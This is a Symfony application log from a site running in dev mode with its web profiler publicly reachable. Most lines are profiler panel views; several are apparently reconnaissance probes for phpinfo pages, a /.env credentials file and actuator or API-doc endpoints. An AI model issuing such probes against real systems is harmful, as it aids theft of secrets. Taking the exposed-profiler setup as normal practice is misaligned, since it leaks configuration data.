[2025-12-16 22:02:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-16 22:04:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3c13a4","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/3c13a4?panel=events","method":"GET"} []
[2025-12-16 22:04:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-16 22:08:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"037234","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/037234?panel=config","method":"GET"} []
[2025-12-16 22:08:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-16 22:15:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e96b9f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e96b9f?panel=twig","method":"GET"} []
[2025-12-16 22:15:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-16 22:15:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 22:21:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b144c2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b144c2?panel=logger","method":"GET"} []
[2025-12-16 22:21:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-16 22:22:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e96b9f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e96b9f?panel=time","method":"GET"} []
[2025-12-16 22:22:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-16 22:28:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e96b9f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e96b9f?panel=security","method":"GET"} []
[2025-12-16 22:28:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-16 22:35:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e96b9f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e96b9f?panel=request","method":"GET"} []
[2025-12-16 22:35:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-16 22:36:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a40855","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a40855?panel=form","method":"GET"} []
[2025-12-16 22:36:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-16 22:42:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e96b9f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e96b9f?panel=config","method":"GET"} []
[2025-12-16 22:42:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-16 22:43:05] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://35.175.10.94/_profiler/phpinfo","method":"GET"} []
[2025-12-16 22:48:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e96b9f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e96b9f?panel=cache","method":"GET"} []
[2025-12-16 22:48:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-16 22:48:46] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-16 22:51:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a2a520","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a2a520?panel=exception","method":"GET"} []
[2025-12-16 22:51:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-16 22:54:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e96b9f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e96b9f","method":"GET"} []
[2025-12-16 22:54:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-16 22:55:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1e0bba","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1e0bba?panel=form","method":"GET"} []
[2025-12-16 22:55:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-16 23:01:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"037234","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/037234?panel=cache","method":"GET"} []
[2025-12-16 23:01:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-16 23:01:25] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-16 23:07:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"037234","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/037234","method":"GET"} []
[2025-12-16 23:07:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-16 23:14:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a0f5ec","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a0f5ec?panel=twig","method":"GET"} []
[2025-12-16 23:14:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-16 23:16:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"130ea7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/130ea7?panel=time","method":"GET"} []
[2025-12-16 23:16:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-16 23:22:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a0f5ec","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a0f5ec?panel=time","method":"GET"} []
[2025-12-16 23:22:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-16 23:27:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d65141","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d65141?panel=form","method":"GET"} []
[2025-12-16 23:27:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-16 23:29:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a0f5ec","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a0f5ec?panel=security","method":"GET"} []
[2025-12-16 23:29:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-16 23:30:32] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-16 23:37:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a0f5ec","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a0f5ec?panel=request","method":"GET"} []
[2025-12-16 23:37:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-16 23:43:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a0f5ec","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a0f5ec?panel=config","method":"GET"} []
[2025-12-16 23:43:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-16 23:46:00] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://auth.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-16 23:47:08] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://web.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-16 23:48:28] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://admin.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-16 23:48:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-16 23:48:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-16 23:48:28] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-16 23:48:28] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-16 23:48:28] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-16 23:48:28] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-16 23:48:29] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F_profiler%2Fphpinfo","method":"GET"} []
[2025-12-16 23:49:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=51.161.81.10&limit=10&method=POST","method":"GET"} []
[2025-12-16 23:49:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=51.161.81.10&limit=10&method=POST","method":"GET"} []
[2025-12-16 23:50:29] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a0f5ec","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a0f5ec?panel=cache","method":"GET"} []
[2025-12-16 23:50:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-16 23:57:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a0f5ec","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a0f5ec","method":"GET"} []
[2025-12-16 23:57:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-16 23:58:36] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-16 23:58:36] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://api.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-16 23:58:36] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 23:58:36] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 23:58:36] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 23:58:36] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-16 23:58:36] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-16 23:58:36] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 00:04:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"34fb9f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/34fb9f?panel=config","method":"GET"} []
[2025-12-17 00:04:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-17 00:06:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"07a9c5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/07a9c5?panel=validator","method":"GET"} []
[2025-12-17 00:06:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-17 00:11:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"34fb9f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/34fb9f?panel=cache","method":"GET"} []
[2025-12-17 00:11:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-17 00:12:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 00:17:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"34fb9f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/34fb9f","method":"GET"} []
[2025-12-17 00:17:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 00:19:36] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://35.175.10.94/_profiler/phpinfo","method":"GET"} []
[2025-12-17 00:24:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"419b71","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/419b71?panel=cache","method":"GET"} []
[2025-12-17 00:24:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-17 00:28:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"499f40","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/499f40?panel=swiftmailer","method":"GET"} []
[2025-12-17 00:28:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-17 00:30:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"37557e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/37557e?panel=twig","method":"GET"} []
[2025-12-17 00:30:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-17 00:37:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"37557e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/37557e?panel=time","method":"GET"} []
[2025-12-17 00:37:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-17 00:40:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/health"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/health\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 00:40:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 00:40:56] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-17 00:44:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"37557e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/37557e?panel=security","method":"GET"} []
[2025-12-17 00:44:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-17 00:45:58] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-17 00:46:46] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 00:51:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"37557e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/37557e?panel=request","method":"GET"} []
[2025-12-17 00:51:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-17 00:57:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"37557e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/37557e?panel=config","method":"GET"} []
[2025-12-17 00:57:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-17 00:59:52] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-17 00:59:52] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-17 01:04:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"37557e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/37557e?panel=cache","method":"GET"} []
[2025-12-17 01:04:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-17 01:07:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2d9351","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2d9351?panel=twig","method":"GET"} []
[2025-12-17 01:07:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-17 01:10:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c18058","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/c18058","method":"GET"} []
[2025-12-17 01:10:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 01:10:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"37557e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/37557e","method":"GET"} []
